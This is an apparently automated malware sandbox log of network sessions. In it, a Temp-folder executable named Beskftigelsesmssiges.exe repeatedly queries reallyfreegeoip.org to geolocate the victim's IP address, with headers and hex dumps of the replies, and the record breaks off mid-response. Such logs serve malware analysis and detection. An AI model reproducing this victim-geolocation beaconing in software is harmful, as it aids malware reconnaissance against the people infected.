                                                                                                                                                                                  2024-12-02 15:15:11 UTC877INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:10 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29933
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5HqTjWWi8UDcGikxYc2UPqF1dXFrn6ltJ5MAjO4lbrDmMqM6CtNzEkxkYjcKbIJq%2FV1RyRLAX%2BGi%2FfjMqqhxXJFSxOFC9xYdmzE1X8pl8UsMt8gw9V2jaa%2B7NXzYIPa1AlDFMZvk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc455968cb5e5f-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1731&rtt_var=674&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1593016&cwnd=251&unsent_bytes=0&cid=e34a0b5befa3ecf7&ts=497&x=0"
                                                                                                                                                                                  2024-12-02 15:15:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.449772172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:12 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-12-02 15:15:13 UTC877INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29936
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MTEFC4YEAa8AS3OyJ8ssOg88DQBlMEU79kZPxiudF%2FoVdTPODkpudaebsL6tqj03mvxOVkkqULg5GBZIBrH%2BaM3t9zcjMlXx7YZbGVvL27KCGk%2Fh9Ik4oQ0veCY0%2Fq0cU1S0n3VM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc4567afe00f37-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=139&unsent_bytes=0&cid=6dae6e52328eea89&ts=489&x=0"
                                                                                                                                                                                  2024-12-02 15:15:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.449779172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:16 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-12-02 15:15:16 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29939
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfHGnIS7Wc4hvD%2BjbsCLXfohAqRidDjtoYViJ%2BEkOj%2B7a5i37f%2B5l0r0AiXjNBAmy3MWcTw%2BQ3s%2F75dpgaIzviOG1J87DygCu1Hf2Zfh02%2F8M88H%2FQBqBoWL4JmI4FoyuMbrXr4l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc457c7fd343b1-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2181&min_rtt=2175&rtt_var=828&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1312949&cwnd=195&unsent_bytes=0&cid=e4a6dfe1b67026e2&ts=461&x=0"
                                                                                                                                                                                  2024-12-02 15:15:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.449790172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:19 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:20 UTC871INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29943
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xyhg%2BGCPLFm8PP4tMQlFFHmyGHjixpdhSaB7JRPN10Q2qXqjTi25vIkCYohsGJhd0wUzMtRjn1bW3Wq56eehX6siA9X1KuwhXpGf44oUDyoanwJBgvCVZ6A6nkiHgoKOvJvaVljN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc45933b0ec448-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1550&rtt_var=588&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1883870&cwnd=228&unsent_bytes=0&cid=cf25c2594eab2f8e&ts=475&x=0"
                                                                                                                                                                                  2024-12-02 15:15:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.449797172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:23 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-12-02 15:15:23 UTC875INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29946
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tn3VDpshP662CseSnleDZmK258v9zzT8nh%2Fzz5BPIaT2Wl9kwvKyvpXUcfcWAVw71jBJZrDdBl0%2FfMoZiiTE1Cgnlz8GJUYr4pwOQ6Lf6%2BmCmD8VRlMu8CbfoCyruNCpP6DXaLBP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc45a85a2743bf-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1753&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1630374&cwnd=252&unsent_bytes=0&cid=8d771b0caac15f85&ts=473&x=0"
                                                                                                                                                                                  2024-12-02 15:15:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.2.449808172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:26 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:27 UTC879INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29950
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXPmlRbzbrk8LPKhWBCrG3nFi5ZR7BuaTq6CfFYJ2Jq0QuKnlXb3bfyFoDIX6eH7W7si6MYVBTOmtpyfOtlWEa3%2F2j%2FTfK%2Bm1NwwNEN5QIHI41sc9O7jm0ATo3Y1hKU%2BEB%2FBvLUp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc45bd8b5841e1-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1742&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1600877&cwnd=243&unsent_bytes=0&cid=743d87ba398d8486&ts=508&x=0"
                                                                                                                                                                                  2024-12-02 15:15:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  8192.168.2.449818172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:30 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:31 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:31 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29954
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bWxLXB%2FvfF50ptmSIMf7Oi7A55ELQC2S58WAmISmU0Allsm%2F2ZWGN8QHHB9NKi8fIvzc%2Fo9s6hGKCUeQRA9Tl12oyKlUTDa2RRb5CvrbKyUYFioofPqS9TWxpyVDM9%2B%2BdQVSl%2FSh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc45d86d6f42a0-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1742&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1665715&cwnd=222&unsent_bytes=0&cid=510140540cb0b397&ts=461&x=0"
                                                                                                                                                                                  2024-12-02 15:15:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  9192.168.2.449826172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:34 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:35 UTC877INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:34 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29957
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQmfHQPJQwJQhFKuVrwwKHoIXAkjCQqaC6mdgeW4sw9TOdfossPYHmqO5%2BGzTmJGVTT21J7U74%2FRgaWP967Sht5R7ZfzK8PMCxMi8ZvUAg1%2B%2FLh08zUidbGfn2NUPBa7j5OVdLSY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ebc45ef5e8a7cb2-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2075&rtt_var=805&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1407228&cwnd=229&unsent_bytes=0&cid=56a5dc21115e3e68&ts=484&x=0"
                                                                                                                                                                                  2024-12-02 15:15:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  10192.168.2.449834172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:38 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:38 UTC879INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 29961
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEDeM4N7M8avEF4k6P69wol3PEFffRuFb5xyh8KY6tlr4c%2B%2B92lROUpmwzmXc53khhMJn3TcEbrKcTvgTCn3%2BqKSK1B9YDlc4vNMEZsry6kD1%2F3SzaXjQ9Ydzr4FNy6ZuzVC%2F6gO"}],"group":"cf-nel","max_age":604800}
